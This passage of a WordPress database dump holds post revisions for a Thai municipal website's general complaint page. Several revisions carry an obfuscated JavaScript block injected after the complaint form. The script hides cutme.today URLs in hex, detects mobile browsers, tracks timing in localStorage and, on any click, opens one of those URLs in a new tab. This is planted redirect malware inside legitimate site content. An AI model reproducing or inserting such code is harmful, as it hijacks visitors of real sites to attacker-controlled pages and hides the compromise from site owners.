)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ช่องการร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','484-revision-v1','','','2025-07-01 10:16:33','2025-07-01 03:16:33','',484,'http://pakhaeng.ssk.in.th/?p=1507',0,'revision','',0),
(1508,1,'2025-07-01 10:16:45','2025-07-01 03:16:45','<!-- wp:shortcode -->\n[forminator_form id=\"1506\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ช่องทางการร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','484-revision-v1','','','2025-07-01 10:16:45','2025-07-01 03:16:45','',484,'http://pakhaeng.ssk.in.th/?p=1508',0,'revision','',0),
(1509,1,'2025-07-01 10:17:16','2025-07-01 03:17:16','','ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353','','inherit','','closed','','%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80-2','','','2025-07-01 10:17:16','2025-07-01 03:17:16','',484,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1.png',0,'attachment','image/png',0),
(1511,1,'2025-07-01 10:17:35','2025-07-01 03:17:35','<!-- wp:image {\"id\":1509,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1.png\" alt=\"\" class=\"wp-image-1509\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:shortcode -->\n[forminator_form id=\"1506\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 